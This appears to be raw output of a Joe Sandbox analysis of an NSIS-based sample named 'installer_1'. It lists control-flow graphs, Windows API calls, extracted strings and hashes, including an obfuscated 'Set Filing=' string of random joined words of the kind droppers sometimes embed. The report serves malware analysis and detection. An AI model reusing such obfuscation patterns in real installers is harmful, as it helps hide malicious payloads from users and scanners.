                                                                                                          control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                          APIs
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                          Strings
                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                          • API String ID: 2872004960-3619442763
                                                                                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                          APIs
                                                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                          • API String ID: 608394941-1650083594
                                                                                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,DatesConsider,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,DatesConsider,DatesConsider,00000000,00000000,DatesConsider,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                          • String ID: DatesConsider$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                          • API String ID: 4286501637-2479521669
                                                                                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00403598
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                          Strings
                                                                                                          • Error launching installer, xrefs: 004035D7
                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                          • soft, xrefs: 00403675
                                                                                                          • Inst, xrefs: 0040366C
                                                                                                          • Null, xrefs: 0040367E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                          • API String ID: 4283519449-527102705
                                                                                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                          • GetTickCount.KERNEL32 ref: 00403464
                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                          • wsprintfW.USER32 ref: 004034A4
                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                          Strings
                                                                                                          • X1C, xrefs: 004033ED
                                                                                                          • Set Filing=iMfVitamins-Plaza-Record-Jewish-Relationship-Purchased-Rolls-Combining-cXldIslam-Lift-Agrees-Obvious-Tight-Training-Denmark-Like-bFrTRr-Latinas-Ins-Certificate-Strategies-CoaDeviation-Ottawa-Congo-Applies-Ir-Displayed-Vault-dKeBeat-Onion-S, xrefs: 004033A9
                                                                                                          • X1C, xrefs: 0040343C
                                                                                                          • ... %d%%, xrefs: 0040349E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                          • String ID: ... %d%%$Set Filing=iMfVitamins-Plaza-Record-Jewish-Relationship-Purchased-Rolls-Combining-cXldIslam-Lift-Agrees-Obvious-Tight-Training-Denmark-Like-bFrTRr-Latinas-Ins-Certificate-Strategies-CoaDeviation-Ottawa-Congo-Applies-Ir-Displayed-Vault-dKeBeat-Onion-S$X1C$X1C
                                                                                                          • API String ID: 651206458-3530543704
                                                                                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2740478559-0
                                                                                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
